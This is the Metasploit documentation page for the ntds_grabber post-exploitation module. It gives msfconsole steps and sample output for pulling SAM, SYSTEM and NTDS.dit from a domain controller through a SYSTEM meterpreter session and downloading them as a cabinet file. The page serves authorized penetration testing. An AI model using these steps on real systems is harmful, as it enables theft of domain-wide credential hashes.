CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/post/windows/gather/ntds_grabber.md
Views: 11789

Creating A Testing Environment

To use this module you need an meterpreter on a domain controller. The meterpreter has to have SYSTEM privileges. Powershell has te be installed.

This module has been tested against:

  1. Windows Server 2008r2

This module was not tested against, but may work against:

  1. Other versions of Windows server.

Verification Steps

  1. Start msfconsole

  2. Obtain a meterpreter session with a meterpreter via whatever method.

  3. Ensure the metepreter has SYSTEM privileges.

  4. Ensure powershell is installed.

  5. Do: 'use post/windows/gather/ntds_grabber '

  6. Do: 'set session #'

  7. Do: 'run'

Scenarios

Windows Server 2008r2 with an x86 meterpreter

msf exploit(psexec) > use post/windows/gather/ntds_grabber 
msf post(ntds_grabber) > set session #
session => #
msf post(ntds_grabber) > run

[+] [2017.04.05-12:26:49] Running as SYSTEM
[+] [2017.04.05-12:26:50] Running on a domain controller
[+] [2017.04.05-12:26:50] PowerShell is installed.
[-] [2017.04.05-12:26:50] The meterpreter is not the same architecture as the OS! Migrating to process matching architecture!
[*] [2017.04.05-12:26:50] Starting new x64 process C:\windows\sysnative\svchost.exe
[+] [2017.04.05-12:26:51] Got pid 3088
[*] [2017.04.05-12:26:51] Migrating..
[+] [2017.04.05-12:26:56] Success!
[*] [2017.04.05-12:26:56] Powershell Script executed
[*] [2017.04.05-12:26:59] Creating All.cab
[*] [2017.04.05-12:27:01] Waiting for All.cab
[*] [2017.04.05-12:27:02] Waiting for All.cab
[+] [2017.04.05-12:27:02] All.cab should be created in the current working directory
[*] [2017.04.05-12:27:05] Downloading All.cab
[+] [2017.04.05-12:27:15] All.cab saved in: /home/XXX/.msf4/loot/20170405122715_default_10.100.0.2_CabinetFile_648914.cab
[*] [2017.04.05-12:27:15] Removing All.cab
[+] [2017.04.05-12:27:15] All.cab Removed
[*] Post module execution completed
msf post(ntds_grabber) > loot

Loot
====

host        service  type          name     content          info                                              path
----        -------  ----          ----     -------          ----                                              ----
10.100.0.2           Cabinet File  All.cab  application/cab  Cabinet file containing SAM, SYSTEM and NTDS.dit  /home/XXX/.msf4/loot/20170405122715_default_10.100.0.2_CabinetFile_648914.cab